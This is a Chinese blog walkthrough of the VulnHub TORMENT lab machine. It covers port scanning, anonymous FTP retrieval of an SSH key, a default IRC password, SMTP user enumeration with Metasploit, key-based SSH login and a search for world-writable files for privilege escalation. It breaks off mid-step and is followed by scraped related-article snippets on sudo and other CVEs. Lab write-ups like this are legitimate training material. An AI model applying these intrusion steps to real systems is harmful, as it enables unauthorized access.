漏洞复现 -- TORMENT

已于 2024-06-28 14:02:17 修改
阅读量590 收藏
点赞数 10
文章标签: 网络安全 安全 python
于 2024-06-28 14:00:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80854251/article/details/140041754
版权

一、靶机地址

https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

二、漏洞复现

sudo arp-scan -l

nmap -p- 192.168.159.163 --min-rate=5000

系统上打开的其他重要端口是 25、80、445、631、2049 和 6667。

ftp 192.168.159.163

Anonymous | 随意

cd .ngircd
ls
get channels

cat channels

cd ..
cd .ssh
get id_rsa

cat id_rsa

安装hexchat访问目标系统

sudo apt-get update
apt install
hexchat

输入目标系统IP地址,但是没有密码。

下载ngircd,查看默认密码。

密码:wealllikedebian

连接后,它要求加入频道,如果你还记得,我们已经有两个频道名称游戏和折磨打印机与我们。我们两者都用了,后者为我们提供了一些重要信息。

登录后,我们找到了一个密码 
mostmachineshaveasupersecurekeyandalongpassphrasell

前面扫到631端口,尝试访问一下。
http://192.168.159.163:631/

点击Printers,发现一些名称,收集下来当作用户字典尝试爆破。

masfconsole
use auxiliary/scanner/smtp/smtp_enum
set rhosts 192.168.159.163
set user.txt
exploit

扫描到用户qiu和patrick

ssh使用密钥尝试登陆用户,最后patrick成功登陆

ssh -i id_rsa patrick@192.168.159.163

mostmachineshaveasupersecurekeyandalongpassphrase

sudo -l
发现只有关机,重启具有root权限

find / -perm 777 -type f 2>/dev/null

发现apache服务的apache.conf对所有用户都具有读写权限。
编辑apache.conf文件,添加如下内容
Torment-vulnhub靶机记录
m0_46580995的博客
08-11 346
开始经典的主机发现端口扫描 有21端口可以开心的匿名登录 成功登录并发现有ssh 和一个没见过的ngircd 跟进发现有一个密钥和一个channels get下来 首先尝试一下ngircd登录 apt-get install hexchat apt-get install ngircd 添加靶机地址(密码是后加的)但是没有密码因为用到的是ngircd尝试用其默认密码登录 cd /etc/ngircd cat ngircd.conf 在配置文件中找到默认密码wealllikedebian登录并
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 8287
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
qq_50854662的博客
02-14 686
漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)
Linux sudo权限提升漏洞复现(CVE-2021-3156)
deng_menglihua的博客
04-19 461
Linux sudo权限提升漏洞复现(CVE-2021-3156) 1.简介 sudo是linux系统管理指令,是允许系统管理员让普通用户执行root命令的一个工具。 2.漏洞概述 编号:CVE-2021-3156 在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户都可以利用此漏洞,不需要进行身份验证,也不用知道用户的密码。利用成功可以获得root权限。 3.影响版本 sudo 1.9.0 到 1.9.5p1 所有版本 sudo 1.8.2 到 1.8.31p2 所有版本 4.环
CVE-2019-14287:sudo 权限绕过漏洞复现过程)
大方子
10-16 787
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
Ms2021-4034漏洞复现
qq_45908805的博客
11-17 385
近日,Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。
靶机渗透练习56-digitalworld.local:TORMENT
hirak0的博客
04-19 4338
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil twin of JOY. Unlike JOY, this machine is designed to drive you crazy. Stephen Hawking once mentioned, “God plays dice and throws them into places where th
PlanarItems:检修Planescape中的项目:Torment,增强版
02-10
平面物品 检修Planescape中的项目:折磨,...该mod更改了(最终)Planescape:Torment(增强版)中的所有项目,目的是平衡选项并使各个级别的游戏更加有趣。 在该软件的官方Beamdog论坛线程上有一个可用的商品目录。
增强游戏体验:PlanarItems对Planescape: Torment的修改
模组可以是为改善游戏平衡性、增加内容的多样性、修复漏洞或是纯粹为了创意而设计。根据描述,该模组特别适用于Planescape: Torment的增强版,它可能是通过官方论坛线程上的商品目录来更新或获取。 4. 如何获取和...
PST-UB-reloaded:Qwinn原版PS未完成业务的改良与兼容性增强
1. Planescape: Torment 未完成业务(PS:T UB) - PST-UB-reloaded是基于Qwinn最初发布的PS:T未完成业务(PST-UB)的改进版本。这表明其开发是建立在一个已经存在的游戏模组之上,而不是从零开始。 - PST-UB是基于...
GemRB Game Engine:GemRB是Infinity Engine的便携式开源实现-开源
04-29
它被编写来支持基于龙与地下城规则集(Baldur's Gate和Icewind Dale系列,Planescape:Torment)的伪3D角色扮演游戏。 它应该在GNU / Linux,Microsoft Windows,OS X,可能还有其他UNIX派生工具等上运行。 它是...
Tomato靶机复现过程
最新发布
weixin_67729650的博客
08-04 2046
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
Linux smb漏洞(CVE-2017-7494)复现
自学编程_youkewang.top
04-14 2560
漏洞编号:CVE-2017-7494 漏洞等级:严重 影响版本:漏洞影响了Samba 3.5.0 之后的版本,不包含4.6.4/4.5.10/4.4.140x01:打开samba配置文件添加以下配置。vi /etc/samba/smb.conf0x02:更新MSF后使用"exploit/linux/samba/is_known_pipename"利用模块,设置rhost后直接exploit即可得到...
Linux:sudo提权漏洞复现
weixin_44767073的博客
11-13 768
关于sudo Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个。出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的权限; 如有必要再来提升权限执行。 sudo就是来解决这个需求的: 这些非root用户不需要知道root的密码,就可以提权到root,执行一些root才能执行的命令。执行命sudo -u <用户名> <令>...
CVE-2017-15715漏洞复现
大方子
07-25 1万+
复现环境 docke apache 2.4.0到2.4.29即可 php5.5 复现过程 先在物理机上创建目录 mkdir -p /var/www/html 然后创建个容器,并关联物理机的/var/www/html目录 docker run -d -v /var/www/html:/var/www/html -p 8080:80 --name apache php...
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
YJJYXM的博客
10-31 566
漏洞描述 2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。 此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。 具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止...
Linux sudo权限提升漏洞(CVE-2021-3156)
热门推荐
Vdieoo的博客
01-27 1万+
1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响范围 受影响版...
[漏洞复现] CVE-2017-16995 Ubuntu16.04漏洞复现
weixin_33725272的博客
04-02 888
1、漏洞概述Ubuntu最新版本16.04存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。***者(普通用户)可以利用该漏洞进行提权***,获取root权限,危害极大。该漏洞编号是CVE-2017-16995,在之前的一些老版本已经修复了,但是在最新的Ubun...
linux nginx 漏洞利用,Debian、Ubuntu发行版的Nginx本地提权漏洞本地复现及分析 | CN-SEC 中文网...
weixin_30800151的博客
05-16 916
摘要3.Linux系统下的文件除了rwx之外还有一种重要的权限,即s。linux系统中每个进程都有2个ID,分别为用户ID(uid)和有效用户ID(euid),UID一般表示进程的创建者(属于哪个用户创建),而EUID表示进程对于文件和资源的访问权限(具备等同于哪个用户的权限)。即真实的进程权限是有EUID标注的而非UID。当一个可执行文件的权限设置了set-user-ID位,那么它在执行时,进程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值